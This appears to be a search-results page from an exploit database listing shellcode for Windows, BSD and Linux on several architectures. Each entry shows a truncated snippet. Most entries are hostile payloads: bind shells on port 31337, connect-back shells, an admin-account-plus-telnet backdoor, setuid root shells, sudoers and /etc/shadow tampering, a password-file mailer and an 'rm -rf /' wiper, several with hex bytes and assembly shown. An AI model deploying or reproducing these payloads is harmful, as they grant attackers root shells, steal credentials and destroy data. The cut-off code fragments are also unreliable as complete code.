7260 matches found
win32 telnetbind by winexec 111 bytes
Exploit for win32 platform in category shellcode ===================================== win32 telnetbind by winexec 111 bytes ===================================== ; payload:add admin acount & Telnet Listening ; Author: DATASNIPER ; size:111 bytes ; platform:WIN32/XP SP2 FR ; thanks:Arab4services...
win32 PEB!NtGlobalFlags shellcode 14 bytes
Exploit for win32 platform in category shellcode ========================================== win32 PEB!NtGlobalFlags shellcode 14 bytes ========================================== / PEB!NtGlobalFlags 14 BYTES Author: Koshi Description: Uses PEB method to determine whether a debugger is attached to...
BSD/x86 - setuid/execve - 30 bytes
No description provided by source. / $Id: setuid-bsd.c,v 1.6 2004/06/02 12:22:30 raptor Exp $ setuid-bsd.c - setuid/execve shellcode for BSD/x86 Copyright c 2003 Marco Ivaldi [email protected] Short setuid0 and /bin/sh execve shellcode based on esdee's code. Tested on OpenBSD and FreeBSD. / ...
BSD/x86 - setuid/portbind - 94 bytes
No description provided by source. / $Id: portbind-bsd.c,v 1.3 2004/06/02 12:22:30 raptor Exp $ portbind-bsd.c - setuid/portbind shellcode for BSD/x86 Copyright c 2003 Marco Ivaldi [email protected] Simple portbind shellcode that bind's a setuid0 shell on port 31337/tcp based on bighawk's...
BSD/x86 - execve(/bin/sh) - 27 bytes
No description provided by source. / execvesh.c by n0gada 27 bytes. / include "stdio.h" char shellcode= "\xeb\x0d\x5f\x31\xc0\x50\x89\xe2" "\x52\x57\x54\xb0\x3b\xcd\x80\xe8" "\xee\xff\xff\xff/bin/sh"; int mainvoid int ret; printf"%d\n",strlenshellcode; ret = int &ret+2; ret = intshellcode; return...
BSD/x86 - execve(/bin/sh) & setuid(0) - 29 bytes
No description provided by source. / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 29 bytes. -setuid0; -execve/bin/sh; / char shellcode= "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\xb0\x17" // mov $0x17,%al "\x50" // push %eax "\xcd\x80" // int $0x80 "\x50" // push %eax...
BSD/32bits - Passive Connection - 126 bytes
No description provided by source. ; Passive Connection Shellcode ; ; Coded by Scrippie - [email protected] - http://b0f.freebsd.lublin.pl ; Buffer0verfl0w Security ; Why? This evades firewalls... ; ; YES, this is for NASM, I detest AT&T syntaxis - it's gross and unreadable ; ; This is the FreeBSD...
BSD/x86 - cat /etc/master.passwd & mail root@localhost - 92 bytes
No description provided by source. / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 92 bytes. execve/bin/sh -c "/bin/cat /etc/master.passwd|mail root@localhost"; pueden reemplzar el comando por lo que se les ocurra. / char shellcode= "\xeb\x25" / jmp shellcode+39 / "\x59" / popl...
Linux/x86-64bits - execve("/bin/sh", ["/bin/sh"], NULL) - 33 bytes
No description provided by source. Linux/X86-64 Dummy for shellcode: execve"/bin/sh", "/bin/sh", NULL hophet at gmail.com .text .globl start start: xorq %rdx, %rdx movq $0x68732f6e69622fff,%rbx shr $0x8, %rbx push %rbx movq %rsp,%rdi xorq %rax,%rax pushq %rax pushq %rdi movq %rsp,%rsi mov $0x3b,%...
Linux/sparc - setreuid(0,0)&standard execve(). 72 bytes
No description provided by source. / Linux/SPARC setreuid0, 0; necessary, /bin/sh drops privs, standard execve. / char c0de = / by michel kaempf / / setuid 0 ; / "\x90\x1a\x40\x09\x82\x10\x20\x17\x91\xd0\x20\x10" / setgid 0 ; / "\x90\x1a\x40\x09\x82\x10\x20\x2e\x91\xd0\x20\x10" / Aleph One : /...
Linux/x86 - edit /etc/sudoers for full access - 86 bytes
No description provided by source. / Author: Rick Email: [email protected] OS: Linux/x86 Description: Anyone can run sudo without password section .text global start start: ;open"/etc/sudoers", OWRONLY | OAPPEND; xor eax, eax push eax push 0x7372656f push 0x6475732f push 0x6374652f mov ebx, es...
Linux/mips - execve("/bin/sh",["/bin/sh"],[]); - 60 bytes
No description provided by source. / - MIPS little-endian - linux execve 60 bytes shellcode - execve"/bin/sh","/bin/sh",; - tested on Linksys WRT54G/GL DD-WRT Linux - based on scut paper Writing MIPS/Irix shellcode vaicebine at gmail dot com / include "stdio.h" char shellcode = "\x50\x73\x06\x24"...
Linux/sparc - connect back - 216 bytes
No description provided by source. / linux sparc connect back shellcode, because someone had to evade those firewalls. sigh / / OS : Linux Architecture : Sparc Type : Connect Back Lenght : 216 Bytes Listen-Port : 2313/TCP Default IP : 192.168.100.1 see how you'll change it at the end. null bytes...
Linux/mips - execve(/bin/sh) - 56 bytes
No description provided by source. / 56 bytes execve /bin/sh shellcode - linux-mipsel - by core [email protected] Note: For MIPS running in little-endian mode. Tested on a Cobalt Qube2 server running Linux 2.4.18 Greetz to bighawk... i couldn't get his execve to work for some reason :/ / char code ...
Linux/x86 - execve("/bin//sh/",["/bin//sh"],NULL)
No description provided by source. / revenge-execve.c, v1.0 2006/10/14 16:32 Yet another linux execve shellcode.. linux/x86 execve"/bin//sh/","/bin//sh",NULL shellcode http://www.0xcafebabe.it [email protected] But this time it's 22 bytes We could start the shellcode with a mov instead of pus...
Linux/x86 - execve("rm -rf /")
No description provided by source. / By Kris Katterjohn 11/18/2006 45 byte shellcode to execve"rm -rf /" for Linux/x86 section .text global start start: ; execve"/bin/rm", "/bin/rm", "-r", "-f", "/", NULL , NULL push byte 11 pop eax cdq push edx push byte 0x2f mov edi, esp push edx push word 0x66...
Linux/x86 - socket-proxy
No description provided by source. /--------------------------------------------------------------------------- 372 byte socket-proxy shellcode by Russell Sanford - [email protected] --------------------------------------------------------------------------- filename: x86-linux-bounce-proxy.c date:...
Linux/x86 - chmod 666 /etc/shadow - 41 bytes
No description provided by source. / [email protected] 0x04abril0x7d2 int syschmodconst char filename, modet mode ... Utilizando la interrupcion 15chmod, asignando el octal 0666 al archivo deseado. En este caso /etc/shadow Hice unas modificaciones en el codigo y solo pude reducir la...
Linux/x86 - bind '/bin/sh' to 31337/tcp - 80 bytes
No description provided by source. / linux/x86 bind '/bin/sh' to 31337/tcp - 80 bytes - izik [email protected] / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx "\x53" // push %ebx "\x6a\x02" // push $0x2 // /...
Linux/x86 - bind '/bin/sh' to 31337/tcp & fork() - 98 bytes
No description provided by source. / linux/x86 bind '/bin/sh' to 31337/tcp + fork - 98 bytes - izik [email protected] / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx "\x53" // push %ebx "\x6a\x02" // push $0...